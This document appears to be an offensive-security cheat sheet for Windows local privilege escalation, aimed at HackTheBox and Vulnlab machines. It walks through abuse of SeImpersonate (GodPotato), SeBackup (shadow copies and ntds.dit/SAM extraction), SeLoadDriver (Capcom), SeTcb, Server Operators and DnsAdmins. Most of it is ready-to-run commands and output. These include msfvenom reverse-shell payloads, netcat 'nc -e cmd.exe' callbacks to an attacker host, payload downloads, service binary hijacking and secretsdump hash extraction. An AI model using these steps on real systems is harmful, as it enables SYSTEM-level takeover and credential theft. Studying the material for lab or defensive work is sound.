Skip to main content

Windows Local Privilege Escalation

SeDebugPrivilege

Migrate PID to privileged process such as WinLogon using ProcessInjection to load adopt.

WinLogon PID: 3488

Adopt binary: adopt.exe

PS /bob> dotnet inline-execute /home/user/ProcessInjection.exe /f:raw /pid:3488 /t:1 /path:C:\Windows\Tasks\adopt.exe

Another Method

msfvenom -p windows/x64/meterpreter/reverse_tcp -ax64 -f exe LHOST=<ip> LPORT=<port> -o shell.exe

PS C:\temp> iwr http://<ip>/shell.exe -outfile shell.exe
PS C:\temp> .\shell.exe

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
msf6 exploit(multi/handler) > set lport 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on <attacker_ip>:<port>
[*] Sending stage (200774 bytes) to <target_ip>
[*] Meterpreter session 1 opened [SNIP]

meterpreter > hashdump

meterpreter > portfwd add -L 127.0.0.1 -l 445 -p 445 -r <target_ip>

impacket-smbexec administrator@127.0.0.1 -hashes :<hash>

SeImpersonatePrivilege

Usually Web (IIS) has this enabled.

  • GodPotato, printerspoofer to Privesc.
C:\Windows\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
...
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
...

PS C:\programdata> iwr http://<tun0>/GodPotato-NET4.exe -outfile gp.exe

PS C:\programdata> .\gp.exe -cmd "C:\Users\Public\nc64.exe -e cmd.exe <tun0> <port>"
[*] CombaseModule: 0x140733127524352
[*] DispatchTable: 0x140733130111304
[*] UseProtseqFunction: 0x140733129406688
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\eb27b3cc-7b5a-420d-8f01-d3094f6ee323\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00000402-0d08-ffff-8e84-859d1b28d501
[*] DCOM obj OXID: 0xd402854b19147ceb
[*] DCOM obj OID: 0x20ef4be3bfc76a84
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 892 Token:0x496  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 3040

➜  nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.150.182] 54910
Microsoft Windows [Version 10.0.20348.2340]
(c) Microsoft Corporation. All rights reserved.

C:\programdata>whoami
nt authority\system

BackupOperators

PS /bob> cd c:\temp
PS /temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
PS /temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append        
PS /temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
PS /temp> diskshadow.exe /s c:\temp\diskshadow.txt

Through Evil-Winrm (to upload/download files)

PS /bob> upload disk.txt C:\Windows\Temp\disk.txt
PS /bob> diskshadow.exe /s C:\Windows\Temp\disk.txt
PS /bob> E:
PS /bob> reg save hklm\system c:\windows\temp\system.bak
PS /bob> reg save hklm\sam c:\windows\temp\sam.bak
PS /bob> upload ./SeBackupPrivilegeCmdLets.dll
PS /bob> upload ./SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeUtils.dll
PS /bob> Import-Module .\SeBackupPrivilegeCmdLets.dll
PS /bob> Copy-FileSeBackupPrivilege e:\windows\ntds\ntds.dit c:\windows\temp\ntds.dit
PS /bob> cd c:\windows\temp
PS /windows/temp> download ntds.dit
PS /windows/temp> download sam.bak
PS /windows/temp> download system.bak

Then on your linux machine you use the 3 files you downloaded to dump the hashes

bobbuilder:/home# impacket-secretsdump -ntds ntds.dit -system system.bak -hashes lnhash:nthash LOCAL -outputfile ntlm-extract

Another way

set context persistent nowriters 
add volume c: alias pwn 
create 
expose %pwn% z: 

*Evil-WinRM* PS C:\temp> upload pwn.txt

*Evil-WinRM* PS C:\temp> type pwn.txt
set context persistent nowriters 
add volume c: alias pwn 
create 
expose %pwn% z: 

*Evil-WinRM* PS C:\temp> diskshadow /s pwn.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  BABYDC,  8/9/2024 10:57:34 PM

-> set context persistent nowriters
-> add volume c: alias pwn
-> create
Alias pwn for shadow ID {041d93f3-797d-4f91-a270-5c1fb66092e6} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c} set as environment variable.

Querying all shadow copies with the shadow copy set ID {7df9215a-2efb-4a28-befe-cbaf15deba8c}

        * Shadow copy ID = {041d93f3-797d-4f91-a270-5c1fb66092e6}               %pwn%
                - Shadow copy set: {7df9215a-2efb-4a28-befe-cbaf15deba8c}       %VSS_SHADOW_SET%
                - Original count of shadow copies = 1
                - Original volume name: \\?\Volume{1b77e212-0000-0000-0000-100000000000}\ [C:\]
                - Creation time: 8/9/2024 10:57:36 PM
                - Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
                - Originating machine: BabyDC.baby.vl
                - Service machine: BabyDC.baby.vl
                - Not exposed
                - Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
                - Attributes:  No_Auto_Release Persistent No_Writers Differential

Number of shadow copies listed: 1
-> expose %pwn% z:
-> %pwn% = {041d93f3-797d-4f91-a270-5c1fb66092e6}
The shadow copy was successfully exposed as z:\.
->

*Evil-WinRM* PS C:\temp> robocopy /b z:\windows\ntds . ntds.dit

-------------------------------------------------------------------------------
   ROBOCOPY     ::     Robust File Copy for Windows
-------------------------------------------------------------------------------

  Started : Friday, August 9, 2024 10:57:58 PM
   Source : z:\windows\ntds\
     Dest : C:\temp\

    Files : ntds.dit

  Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30

------------------------------------------------------------------------------

                           1    z:\windows\ntds\
            New File              16.0 m        ntds.dit

[snipped]

*Evil-WinRM* PS C:\temp> reg save HKLM\SYSTEM c:\temp\system
The operation completed successfully.

*Evil-WinRM* PS C:\temp> download system

Info: Downloading C:\temp\system to system

Info: Download successful!

*Evil-WinRM* PS C:\temp> download ntds.dit

Info: Downloading C:\temp\ntds.dit to ntds.dit

Info: Download successful!

➜  secretsdump.py -system system -ntds ntds.dit local

SeLoadDriverPrivilege

-> https://github.com/k4sth4/SeLoadDriverPrivilege

➜  msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f exe -o shell.exe

*Evil-WinRM* PS C:\temp> upload Capcom.sys
*Evil-WinRM* PS C:\temp> upload ExploitCapcom.exe
*Evil-WinRM* PS C:\temp> upload eoploaddriver_x64.exe
*Evil-WinRM* PS C:\temp> upload shell.exe

*Evil-WinRM* PS C:\temp> .\eoploaddriver_x64.exe System\CurrentControlSet\dfserv C:\temp\Capcom.sys

*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe LOAD \temp\Capcom.sys

*Evil-WinRM* PS C:\temp> .\ExploitCapcom.exe EXPLOIT .\shell.exe

SeTcbPrivilege

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
...
SeTcbPrivilege                Act as part of the operating system Enabled
...

-> https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> iwr http://<tun0>/TcbElevation.exe -outfile TcbElevation.exe

-> https://github.com/xct/rcat

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload rcat_10.8.0.210_443.exe

*Evil-WinRM* PS C:\Users\svc_deploy\Documents> .\TcbElevation.exe pwn "C:\Windows\system32\cmd.exe /c C:\Users\svc_deploy\Documents\rcat_10.8.0.210_443.exe"
Error starting service 1053

➜  rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.8.0.210] from (UNKNOWN) [10.10.153.117] 53924
Microsoft Windows [Version 10.0.20348.2113]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

Server Operators

bobbuilder:/home# upload /usr/share/windows-resources/binaries/nc.exe

PS /bob> sc.exe config vss binPath="C:\Path\nc.exe -e cmd.exe ip 1234"

PS /bob> sc.exe stop vss

PS /bob> sc.exe start vss

DnsAdmins Group

-> https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise When we are member of this group we can ask the machine to load an arbitrary DLL file when the service starts so that gives us RCE as SYSTEM. We can re-configure the service and we have the required privileges to restart it.

➜  msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll > shell.dll

*Evil-WinRM* PS C:\temp> upload shell.dll

*Evil-WinRM* PS C:\temp> cmd /c 'dnscmd <DC> /config /serverlevelplugindll C:\temp\shell.dll'

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe \\<DC> stop dns

SERVICE_NAME: dns 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 3  STOP_PENDING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

*Evil-WinRM* PS C:\temp> sc.exe \\<DC> start dns

SERVICE_NAME: dns 
        TYPE               : 10  WIN32_OWN_PROCESS  
        STATE              : 2  START_PENDING 
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 3500
        FLAGS

➜  rlwrap nc -nlvp 9001
...

PS C:\Windows\system32> whoami
nt authority\system

Resources

  • https://x.com/fr0gger_/status/1379465943965909000
  • https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/
  • https://github.com/k4sth4/SeLoadDriverPrivilege
  • https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/access-tokens
  • https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens
  • https://x.com/splinter_code/status/1568548572861267968
  • https://gist.github.com/antonioCoco/19563adef860614b56d010d92e67d178
  • https://snowscan.io/htb-writeup-blackfield/
  • https://snowscan.io/htb-writeup-resolute/
  • https://www.thehacker.recipes/a-d/movement/domain-settings/builtin-groups
  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/from-dnsadmins-to-system-to-domain-compromise

Machines to try:

  • Baby (Vulnlab)
  • Blackfield (HackTheBox)
  • Resolute (HackTheBox)
  • Fuse (HackTheBox)
  • POV (HackTheBox)
  • Job (Vulnlab)
  • Sidecar (Vulnlab)
Back to top